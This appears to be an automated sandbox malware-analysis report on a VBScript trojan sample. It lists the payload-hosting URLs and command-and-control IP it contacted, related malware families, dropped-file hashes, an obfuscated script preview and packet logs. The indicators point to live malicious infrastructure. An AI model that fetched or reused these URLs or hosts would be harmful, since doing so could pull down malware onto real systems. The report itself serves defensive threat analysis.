          http://alhalalasia.org/search/innocencepowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://alhalalasia.org/search/innocence.mpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://karunavriksha.org/images/powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://karunavriksha.org/imagpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://karunavriksha.org/images/innocencpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://alhalalasia.org/search/innocence.msopowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://alhalalasia.org/search/innocepowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://karunavriksha.org/images/innopowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://contoso.com/powershell.exe, 00000007.00000002.2098645620.0000000005208000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1143648343.000001AF90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2098645620.0000000005208000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://karunavriksha.orpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://alhalalasia.org/searpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://alhalalasia.org/searcpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://karunavriksha.org/imagespowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1117306076.000001AF80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081602385.00000000041A1000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://alhalalasia.org/sepowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://karunavriksha.org/impowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://karunavriksha.org/images/innocence.msolbpowershell.exe, 00000004.00000002.1155363014.000001AFFE170000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://alhalalasia.org/search/powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://karunavriksha.org/images/innocpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1143648343.000001AF90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2098645620.0000000005208000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://alhalalasia.org/search/inpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://karunavriksha.org/images/innocenpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
URL | Source | Malicious | Antivirus Detection | Reputation
http://alhalalasia.org/search/inno | powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://karunavriksha.org | powershell.exe, 00000004.00000002.1117306076.000001AF80F8A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://karunavriksha.org/images/innocence.m | powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://alhalalasia.org/search/innocence.msoP | powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000007.00000002.2098645620.0000000005208000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.ver) | svchost.exe, 00000009.00000002.2339023640.0000019942800000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://karunavriksha.org/images/innocence | powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://karunavriksha.org/images/i | powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://karunavriksha.org/images/innocence.ms | powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://alhalalasia.org/search/innocenc | powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://karunavriksha.org | powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://alhalalasia.org/search/i | powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://karunavriksha.org/i | powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore6lB;r | powershell.exe, 00000007.00000002.2081602385.00000000041A1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://karunavriksha.org/images/innocence. | powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/Prod-C: | svchost.exe, 00000009.00000003.1203845695.00000199426A3000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://alhalalasia.org | powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/ProdV2-C: | svchost.exe, 00000009.00000003.1203845695.0000019942670000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://alhalalasia.org/search/innocence.ms | powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://alhalalasia.org/ | powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://alhalalasia.o | powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://karunavriksha.org/ | powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://karunavriksha.o | powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://karunavriksha.org/images/innoce | powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000004.00000002.1117306076.000001AF80001000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://alhalalasia.org/search/innoc | powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://alhalalasia.org/s | powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://alhalalasia.org/sea | powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://karunavriksha.org/images/inn | powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
146.88.26.238 | karunavriksha.org | India | 17439 | NETMAGIC-APNetmagicDatacenterMumbaiIN | false
                                    IP
                                    127.0.0.1
                                    Joe Sandbox version:42.0.0 Malachite
                                    Analysis ID:1658919
                                    Start date and time:2025-04-08 08:11:14 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 7m 25s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:19
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:Blikvarefabrikken.vbs
                                    Detection:MAL
                                    Classification:mal100.troj.expl.evad.winVBS@14/11@1/2
                                    EGA Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 89%
                                    • Number of executed functions: 72
                                    • Number of non-executed functions: 28
                                    Cookbook Comments:
                                    • Found application associated with file extension: .vbs
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 23.204.23.20, 4.245.163.56
                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target powershell.exe, PID 6456 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 6560 because it is empty
• Not all processes were analyzed; report is missing behavior information
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:12:25 | API Interceptor | 88x Sleep call for process: powershell.exe modified
02:12:44 | API Interceptor | 2x Sleep call for process: svchost.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
146.88.26.238 | Контракт_№_OX-SOC_150923_FOB.exe | malicious | GuLoader, Remcos | whirlwindprojects.com/donkG148.bin
                                    No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
NETMAGIC-APNetmagicDatacenterMumbaiIN | xd.x86.elf | malicious | Mirai | 203.95.216.170
| hgfs.mpsl.elf | malicious | Unknown | 103.25.131.177
| http://arayaaspintex.com | malicious | Unknown | 146.88.25.77
| https://docs.google.com/presentation/d/e/2PACX-1vRRvWKWO_NaaKl4EhF01H_whQST10fp7Q0VUGzOgS_TF3NkYgjRysFJBvSu4s7PnWAGg2HaymZq30EK/pub?start=false&loop=false&delayms=3000&pli=1&slide=id.p | malicious | Unknown | 164.52.215.14
| sora.m68k.elf | malicious | Mirai | 180.179.125.125
| kzTq7Bt.exe | malicious | Unknown | 103.235.105.107
| Hgf.m68k.elf | malicious | Mirai | 180.179.125.106
| x86_64.nn.elf | malicious | Mirai, Okiru | 180.179.240.71
| F8HYX5HOgA.vbs | malicious | GuLoader, RHADAMANTHYS | 103.120.177.150
| tmkSAOF3GM.vbs | malicious | GuLoader, RHADAMANTHYS | 103.120.177.150
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Copy of the Invoice.vbs | malicious | Batch Injector, MSIL Logger, MassLogger RAT | 146.88.26.238
| ACHPaymentAdvice.js | malicious | AsyncRAT | 146.88.26.238
| Winlogon.vbs | malicious | AsyncRAT | 146.88.26.238
| Detailed packing list 25DMPT01.js | malicious | Unknown | 146.88.26.238
| INV-13M250005929.js | malicious | AgentTesla | 146.88.26.238
| https://cdn.old.server.spacebar.chat/attachments/1359012833967595815/1359012962651607231/ZapytanieGarantisedlers5352522223256736325.zip | malicious | Unknown | 146.88.26.238
| HSC NEW LUCKY V01.25 PARTICULARS.xlsx.scr.exe | malicious | AgentTesla, PureLog Stealer | 146.88.26.238
| SecuriteInfo.com.Win32.PWSX-gen.21545.7289.exe | malicious | Snake Keylogger, VIP Keylogger | 146.88.26.238
| KAPAL CANTIK AGENCY APPOINTMENT.pdf.scr.exe | malicious | AgentTesla, PureLog Stealer | 146.88.26.238
| PO.exe | malicious | MSIL Logger, MassLogger RAT | 146.88.26.238
                                    No context
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1310720
                                    Entropy (8bit):0.4932203403530737
                                    Encrypted:false
                                    SSDEEP:1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1ZtaL:cJhXC9lHmutpJyiRDeJ/aUKrDgnmh
                                    MD5:C449154787A8AC604E5FDFD8ADDF47BA
                                    SHA1:A399744868C4C9905477D862AF102BD1121DBF60
                                    SHA-256:30FDBF7D12AB6C46021A33A9BDFE492C87065C49BEB8EE0CB9761007F4BBBA13
                                    SHA-512:CA7DC2824926B56D926768F238D6FEC500E6A311D7F0307D724D4E613B90CE34E61E2E5FAC0F791807B5BC3BC2BDCDA6345DF2EC55B3DA79A01790BF44BF0340
                                    Malicious:false
                                    Reputation:low
                                    Preview:^.;V........@..@-....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................&.#.\.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x08141935, page size 16384, DirtyShutdown, Windows version 10.0
                                    Category:dropped
                                    Size (bytes):1310720
                                    Entropy (8bit):0.7217342786784623
                                    Encrypted:false
                                    SSDEEP:1536:jSB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:jazaNvFv8V2UW/DLzN/w4wZi
                                    MD5:2696E4EDE50564AD39932BD60A7E6675
                                    SHA1:5101E786EACD07C48D5EA252F6D1EF1D7A1C64B9
                                    SHA-256:44F4EFD3D7453BC1809E9B6490D35BF3C31C39CE38AD208C49B4E21209F4E068
                                    SHA-512:E82F99294E26B5F189B1CA16F81AC47ADB7AB6CF4FE8864BBA3AD9F4F553A7A03C01927977CD64BEB183CB584294FB11A647A664120A5382EBFDC61F52849D2E
                                    Malicious:false
                                    Preview:...5... ...............X\...;...{......................p.D..........{}.,....}..h.F.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......-....{...............................................................................................................................................................................................2...{...................................,$,....}.;................vK.4,....}...........................#......h.F.....................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):16384
                                    Entropy (8bit):0.08099323468159275
                                    Encrypted:false
                                    SSDEEP:3:JGml/llKYe+2iPw/fgsCrZClW/t8xjUitllall+SHY/Xl+/rQLve:sm1KzFiPwfgs3G6lUitlAAS4M
                                    MD5:02817B84F09B9B1CEB4A6F5920A99998
                                    SHA1:8BDDF07F2F855012E9E60F30B472A692126E8996
                                    SHA-256:7DF686C4F5A9E45B99C16C62B89D0128661D1466538AE5A67233FE1221AE0188
                                    SHA-512:BCEE124A17843CEF5EB075DB45FECDB7A1B00D9D9D7BA1076219280C58A0FFC7CA4CB61802343F29519D5C3A1CBB32E21CB00759F3E08E4D28B2A37DE43117BA
                                    Malicious:false
                                    Preview:.~.....................................;...{..,....}.......{}..............{}......{}.vv_Q.....{}.................vK.4,....}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:modified
                                    Size (bytes):8003
                                    Entropy (8bit):4.840877972214509
                                    Encrypted:false
                                    SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                    MD5:106D01F562D751E62B702803895E93E0
                                    SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                    SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                    SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                    Malicious:false
                                    Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):1.1940658735648508
                                    Encrypted:false
                                    SSDEEP:3:NlllulJnp/p:NllU
                                    MD5:BC6DB77EB243BF62DC31267706650173
                                    SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                    SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                    SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                    Malicious:false
                                    Preview:@...e.................................X..............@..........
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                    Category:dropped
                                    Size (bytes):643188
                                    Entropy (8bit):5.942960699479941
                                    Encrypted:false
                                    SSDEEP:12288:FcjIlyuktF9USUIBbfBiHdtZ7kN/igL0voHds70j+40tRCrf8:eMUFwBIPi9DkN6BvoH2JL
                                    MD5:3AC75E8B652807F6AFB45E2180BE437B
                                    SHA1:F303B3F845D15A3A59B2C7811A966DDA8ACDD9BC
                                    SHA-256:29E815DC846277FE7158374D957E4F765E6041BF410CD4FE161472C0B38A57B0
                                    SHA-512:36B3187BE752206E69E28DC6B4384FA45815D6BE6B4AF74A4E56461720B80223A79E1CFF0895D344CBD9CA98A0B16BC425E3D83B31F6B59FEDACDD500EF78984
                                    Malicious:false
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):55
                                    Entropy (8bit):4.306461250274409
                                    Encrypted:false
                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                    Malicious:false
                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                    File type:ASCII text, with CRLF line terminators
                                    Entropy (8bit):5.192553684212169
                                    TrID:
                                    • Visual Basic Script (13500/0) 100.00%
                                    File name:Blikvarefabrikken.vbs
                                    File size:19'009 bytes
                                    MD5:b7d8d9cb6cffa5ae6ecb12d0b1a85b27
                                    SHA1:cbdc3d17f572bec63e07a1a734ae80b4b3f09adb
                                    SHA256:327a98bd948262a10e37e7d0692c95e30ba41ace15fe01d8e614a9813ad9d5cf
                                    SHA512:e4ff60ad78450ae1fd87903a780db12a96c77ca6620a2bb7252559b2840628b28678a3986a1d27e90155f37c7c2ea9702feff68f8c7a107f7b31a9047ba0cc46
                                    SSDEEP:192:6TSTc9d2m/kcyO2mqn8xOlMUpyot033zVT2FESWwK9AfiBQZz1eT9N/dtyleTRW0:Qnom/0IOlyo2zVy2jAmN/dXcG5
                                    TLSH:2C8272B2D569E335CF465E945F56050341E06A366CB198B56EFF43CCB022D88F22AF8A
                                    File Content Preview:....Uholdbarcelleker = FormatCurrency(2694606)....Dim Turkmenian....Forureningssagerne = Evadne ....'Tabriz? fedesvinenes117?..Do ..'hjpasfilter fdsler rejsegodsforsikring? autoktone, rendyrkninger....Opbruddene = Now....Slagvoluminetirr = Now....'preimmu
                                    Icon Hash:68d69b8f86ab9a86


                                    • Total Packets: 107
                                    • 443 (HTTPS)
                                    • 53 (DNS)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 8, 2025 08:12:28.370841026 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:28.370879889 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:28.371030092 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:28.379060030 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:28.379077911 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:28.986186981 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:28.986264944 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:29.000952959 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:29.000989914 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:29.001315117 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:29.009844065 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:29.052273035 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:29.876262903 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:29.876290083 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:29.876303911 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:29.876513004 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:29.876529932 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:29.876620054 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:29.924750090 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:29.924774885 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:29.924904108 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:29.924922943 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:29.974936962 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.175232887 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.175261974 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
Apr 8, 2025 08:12:30.175540924 CEST | 49683 | 443 | 192.168.2.9 | 146.88.26.238
Apr 8, 2025 08:12:30.175560951 CEST | 443 | 49683 | 146.88.26.238 | 192.168.2.9
